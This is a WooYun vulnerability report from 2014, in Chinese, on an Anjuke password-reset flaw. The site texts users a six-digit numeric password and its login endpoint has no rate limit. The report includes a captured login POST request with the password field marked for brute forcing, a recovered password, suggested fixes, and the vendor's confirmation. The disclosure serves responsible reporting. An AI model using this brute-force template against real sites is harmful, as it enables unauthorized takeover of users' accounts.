当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-050569

漏洞标题:安居客任意用户密码重置漏洞

相关厂商:安居客

漏洞作者: niliu

提交时间:2014-02-10 15:41

修复时间:2014-03-27 15:42

公开时间:2014-03-27 15:42

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-02-10: 细节已通知厂商并且等待厂商处理中
2014-02-10: 厂商已经确认,细节仅向厂商公开
2014-02-20: 细节向核心白帽子及相关领域专家公开
2014-03-02: 细节向普通白帽子公开
2014-03-12: 细节向实习白帽子公开
2014-03-27: 细节向公众公开

简要描述:

hi~好久不见 :)

详细说明:

安居客用户密码重置方法比较迂回,测试了一下密码找回,包括邮箱找回手机找回,邮箱找回没有发现什么问题,手机找回也跟以往的暴力破解验证码不太一样,安居客手机找回密码是系统直接生产一个随机密码发送到用户手机上。
但是这个密码竟然是一个纯6位数字的,这点跟验证码就不一样了,验证码一般有时效性限制。
密码就不同了。于是就像从登陆的地方下手。
先用手机号找回密码,手机收到一个6位数字新密码。于是在登陆时候抓包。

POST /login HTTP/1.1
Host: member.anjuke.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://user.anjuke.com/my/login?history=aHR0cDov**ZXIuYW5qdWtlLmNvbS9tZW1iZXIvbW9kaWZ5L3B3ZC8=
Cookie: *(&……
Content-Type: application/x-www-form-urlencoded
Content-Length: 191
Connection: close
loginpost=1&formhash=&sid=anjuke&url=aHR0cDovL3**XIuYW5qdWtlLmNvbS9tZW1iZXIvbW9kaWZ5L3B3ZC8%3D&systemtime=1392010893&username=18*******04&password=§111111§&remember=1&submit=%E7%99%BB%E5%BD%95


对密码password参数进行暴力破解。就可以得到用户真实的新密码。从而重置了用户密码。
看截图

1.jpg


得到真实的密码 190281.登陆后系统会要求再改一次密码。

2.jpg

漏洞证明:

具体的过程就是这样

修复方案:

#系统生成的密码建议数字字母组合
#登陆接口做下限制

版权声明:转载请注明来源 niliu@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-02-10 15:47

厂商回复:

非常感谢您的报告,问题已着手处理。安居客安全员,可以直接联系我 qq:

最新状态:

暂无